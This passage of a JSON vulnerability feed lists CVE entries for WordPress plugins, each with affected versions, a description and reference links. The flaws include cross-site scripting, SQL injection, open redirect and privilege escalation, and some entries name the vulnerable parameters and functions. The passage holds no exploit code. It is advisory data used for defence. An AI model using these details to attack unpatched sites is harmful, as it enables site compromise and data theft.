replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-pro-lite\\\/tags\\\/1.4.1\\\/public\\\/class-sliderpro.php#L310\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-pro-lite\\\/tags\\\/1.4.1\\\/public\\\/class-sliderpro.php#L310\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-pro-lite\\\/tags\\\/1.4.1\\\/public\\\/class-sliderpro.php#L447\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-pro-lite\\\/tags\\\/1.4.1\\\/public\\\/class-sliderpro.php#L447\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-pro-lite\\\/tags\\\/1.4.1\\\/public\\\/class-sliderpro.php#L98\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-pro-lite\\\/tags\\\/1.4.1\\\/public\\\/class-sliderpro.php#L98\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-pro-lite\\\/tags\\\/1.4.1\\\/public\\\/class-slider-renderer.php#L181\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slider-pro-lite\\\/tags\\\/1.4.1\\\/public\\\/class-slider-renderer.php#L181\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d10036de-940f-4772-9aca-13bc647548d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d10036de-940f-4772-9aca-13bc647548d2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11226","slug":"facebook-like-send-button","versionImpact":"1.2","description":"The FireCask Like & Share Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'width' parameter in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/facebook-like-send-button\\\/tags\\\/1.2\\\/class-frontend.php#L121\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/facebook-like-send-button\\\/tags\\\/1.2\\\/class-frontend.php#L121\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225838\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3225838\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/facebook-like-send-button\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/facebook-like-send-button\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b9d61cd-1955-40d0-99b4-c75f480733f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b9d61cd-1955-40d0-99b4-c75f480733f8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13537","slug":"c9-blocks","versionImpact":"1.7.7","description":"The C9 Blocks plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 1.7.7. This is due the plugin containing a publicly accessible composer-setup.php file with error display enabled. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/c9-blocks\\\/trunk\\\/composer-setup.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/c9-blocks\\\/trunk\\\/composer-setup.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3e682fb-e821-45cb-a087-d97d42a3743e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3e682fb-e821-45cb-a087-d97d42a3743e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2801","slug":"abcsubmit","versionImpact":"1.2.4","description":"The The Create custom forms for WordPress with a smart form plugin for smart businesses plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.2.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/abcsubmit\\\/tags\\\/1.2.4\\\/abcsubmit.php#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/abcsubmit\\\/tags\\\/1.2.4\\\/abcsubmit.php#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/abcsubmit\\\/tags\\\/1.2.4\\\/abcsubmit.php#L88\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/abcsubmit\\\/tags\\\/1.2.4\\\/abcsubmit.php#L88\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/abcsubmit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/abcsubmit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e45afda4-447a-4d95-90cb-9731b398a009?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e45afda4-447a-4d95-90cb-9731b398a009?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5733","slug":"modern-events-calendar-lite","versionImpact":"7.21.9","description":"The Modern Events Calendar Lite plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 7.21.9. This is due improper or insufficient validation of the id property when exporting calendars. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","refs":"[{\"url\":\"https:\\\/\\\/webnus.net\\\/dox\\\/modern-events-calendar\\\/\",\"name\":\"https:\\\/\\\/webnus.net\\\/dox\\\/modern-events-calendar\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/modern-events-calendar-lite\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/modern-events-calendar-lite\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e545b53e-7054-41dc-b69b-7552ef6c3240?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e545b53e-7054-41dc-b69b-7552ef6c3240?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1426","slug":"wp-tiles","versionImpact":"1.1.2","description":"The WP Tiles WordPress plugin through 1.1.2 does not ensure that posts to be displayed are not draft\/private, allowing any authenticated users, such as subscriber to retrieve the titles of draft and privates posts for example. AN attacker could also retrieve the title of any other type of post.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fdd79bb4-d434-4635-bb2b-84d079ecc746\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fdd79bb4-d434-4635-bb2b-84d079ecc746\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4946","slug":"accesspress-anonymous-post","versionImpact":"2.8.4","description":"The Frontend Post WordPress Plugin WordPress plugin through 2.8.4 does not validate an attribute of one of its shortcode, which could allow users with a role as low as contributor to add a malicious shortcode to a page\/post, which will redirect users to an arbitrary domain.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e222018-a3e0-4af0-846c-6f00b67dfbc0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6e222018-a3e0-4af0-846c-6f00b67dfbc0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2271","slug":"tiempocom","versionImpact":"0.1.2","description":"The Tiempo.com WordPress plugin through 0.1.2 does not have CSRF check when deleting its shortcode, which could allow attackers to make logged in admins delete arbitrary shortcode via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31512f33-c310-4b36-b665-19293097cc8b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31512f33-c310-4b36-b665-19293097cc8b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0378","slug":"ai-engine","versionImpact":"2.2.0","description":"The AI Engine: Chatbots, Generators, Assistants, GPT 4 and more! plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the AI chat data when discussion tracking is enabled in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54344300-6288-40bc-b539-3dc9b555ed00?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/54344300-6288-40bc-b539-3dc9b555ed00?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3043570%40ai-engine&new=3043570%40ai-engine&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3043570%40ai-engine&new=3043570%40ai-engine&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3918","slug":"pet-manager","versionImpact":"1.4","description":"The Pet Manager WordPress plugin through 1.4 does not sanitise and escape some of its Pet settings, which could allow high privilege users such as Contributor to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2074d0f5-4165-4130-9391-37cb21e8aa1b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2074d0f5-4165-4130-9391-37cb21e8aa1b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8761","slug":"share-this-image","versionImpact":"2.03","description":"The Share This Image plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 2.03. This is due to insufficient validation on the redirect url supplied via the link parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e72d5c7-c601-4775-a825-4786bbd1b5f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1e72d5c7-c601-4775-a825-4786bbd1b5f0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/share-this-image\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/share-this-image\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.03\\\/assets\\\/js\\\/sti.js#L693\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.03\\\/assets\\\/js\\\/sti.js#L693\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.03\\\/includes\\\/class-sti-shortlink.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.03\\\/includes\\\/class-sti-shortlink.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.03\\\/includes\\\/class-sti-shortlink.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/share-this-image\\\/tags\\\/2.03\\\/includes\\\/class-sti-shortlink.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152564\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152564\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10592","slug":"mapster-wp-maps","versionImpact":"1.6.0","description":"The Mapster WP Maps plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the popup class parameter in all versions up to, and including, 1.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f1c13f6-150c-4634-a4d8-176a4d7a2296?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f1c13f6-150c-4634-a4d8-176a4d7a2296?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mapster-wp-maps\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mapster-wp-maps\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11777","slug":"sell-media","versionImpact":"2.5.8.5","description":"The Sell Media plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sell_media_search_form_gutenberg' shortcode in all versions up to, and including, 2.5.8.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sell-media\\\/trunk\\\/\\\/gutenberg\\\/blocks\\\/sell-media-search-form\\\/sell-media-search-form.php#L219\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sell-media\\\/trunk\\\/\\\/gutenberg\\\/blocks\\\/sell-media-search-form\\\/sell-media-search-form.php#L219\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sell-media\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sell-media\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a35f0bb-691f-4acf-a30d-4ddabe3b919c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8a35f0bb-691f-4acf-a30d-4ddabe3b919c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13388","slug":"tcbd-tooltip","versionImpact":"1.0","description":"The TCBD Tooltip plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tcbdtooltip_text' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tcbd-tooltip\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tcbd-tooltip\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43ca15b7-8cb4-427f-892d-15022da17b2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43ca15b7-8cb4-427f-892d-15022da17b2e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5701","slug":"hypercomments","versionImpact":"1.2.2","description":"The HyperComments plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the hc_request_handler function in all versions up to, and including, 1.2.2. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hypercomments\\\/trunk\\\/hypercomments.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hypercomments\\\/trunk\\\/hypercomments.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07fd6bee-5b00-4fc1-9f7a-3857fd35c763?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07fd6bee-5b00-4fc1-9f7a-3857fd35c763?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4941","slug":"woo-bulk-editor","versionImpact":"1.1.3.3","description":"The BEAR for WordPress is vulnerable to Missing Authorization in versions up to, and including, 1.1.3.3. This is due to a missing capability check on the woobe_bulkoperations_swap function. This makes it possible for authenticated attackers (subscriber or higher) to manipulate products.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L521\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L521\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc20f303-cac3-4517-9c45-153c410a13af?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc20f303-cac3-4517-9c45-153c410a13af?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1775","slug":"nextend-facebook-connect","versionImpact":"3.1.12","description":"The Nextend Social Login and Register plugin for WordPress is vulnerable to a self-based Reflected Cross-Site Scripting via the \u2018error_description\u2019 parameter in all versions up to, and including, 3.1.12 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers, with access to a subscriber-level account, to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. NOTE: This vulnerability can be successfully exploited on a vulnerable WordPress instance against an OAuth pre-authenticated higher-level user (e.g., administrator) by leveraging a cross-site request forgery in conjunction with a certain social engineering technique to achieve a critical impact scenario (cross-site scripting to administrator-level account creation). However, successful exploitation requires \"Debug mode\" to be enabled in the plugin's \"Global Settings\".","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bad1d0d-3817-4c7f-a012-5a85b577781e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bad1d0d-3817-4c7f-a012-5a85b577781e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042326\\\/nextend-facebook-connect\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3042326\\\/nextend-facebook-connect\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0337","slug":"travelpayouts","versionImpact":"1.1.16","description":"The Travelpayouts: All Travel Brands in One Place WordPress plugin through 1.1.15 is vulnerable to Open Redirect due to insufficient validation on the travelpayouts_redirect variable. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2f17a274-8676-4f4e-989f-436030527890\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2f17a274-8676-4f4e-989f-436030527890\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3917","slug":"pet-manager","versionImpact":"1.4","description":"The Pet Manager WordPress plugin through 1.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88162016-9fc7-4194-9e81-44c50991f6e9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/88162016-9fc7-4194-9e81-44c50991f6e9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5576","slug":"tutor-lms-elementor-addons","versionImpact":"2.1.4","description":"The Tutor LMS Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'course_carousel_skin' attribute within the plugin's Course Carousel widget in all versions up to, and including, 2.1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fdd1b1c-84b5-451a-a921-80be3b154398?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fdd1b1c-84b5-451a-a921-80be3b154398?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor-lms-elementor-addons\\\/tags\\\/2.1.4\\\/templates\\\/course\\\/course-carousel.php#L81\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor-lms-elementor-addons\\\/tags\\\/2.1.4\\\/templates\\\/course\\\/course-carousel.php#L81\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136459\\\/#file9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136459\\\/#file9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136459\\\/#file13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136459\\\/#file13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136459\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136459\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tutor-lms-elementor-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/tutor-lms-elementor-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10645","slug":"blogger-301-redirect","versionImpact":"2.5.3","description":"The Blogger 301 Redirect plugin for WordPress is vulnerable to blind time-based SQL Injection via the \u2018br\u2019 parameter in all versions up to, and including, 2.5.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06359274-37ae-47f5-824c-25600c5b06eb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06359274-37ae-47f5-824c-25600c5b06eb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blogger-301-redirect\\\/trunk\\\/bloggerredirect.php#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blogger-301-redirect\\\/trunk\\\/bloggerredirect.php#L93\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11437","slug":"timeline-designer","versionImpact":"1.4","description":"The Timeline Designer plugin for WordPress is vulnerable to SQL Injection via the 's' parameter in all versions up to, and including, 1.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timeline-designer\\\/trunk\\\/admin\\\/assets\\\/admin-shortcode-list.php#L41\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/timeline-designer\\\/trunk\\\/admin\\\/assets\\\/admin-shortcode-list.php#L41\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12349179-e61c-42b8-b0ff-5b49fc4906c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/12349179-e61c-42b8-b0ff-5b49fc4906c1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13379","slug":"c9-admin-dashboard","versionImpact":"1.3.5","description":"The C9 Admin Dashboard plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/c9-admin-dashboard\\\/trunk\\\/c9-admin.php#L51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/c9-admin-dashboard\\\/trunk\\\/c9-admin.php#L51\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/c9-admin-dashboard\\\/trunk\\\/c9-admin.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/c9-admin-dashboard\\\/trunk\\\/c9-admin.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/c9-admin-dashboard\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/c9-admin-dashboard\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88f4af1b-5e3c-4129-93c3-4f368bd2b0db?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/88f4af1b-5e3c-4129-93c3-4f368bd2b0db?source=cve\",\"r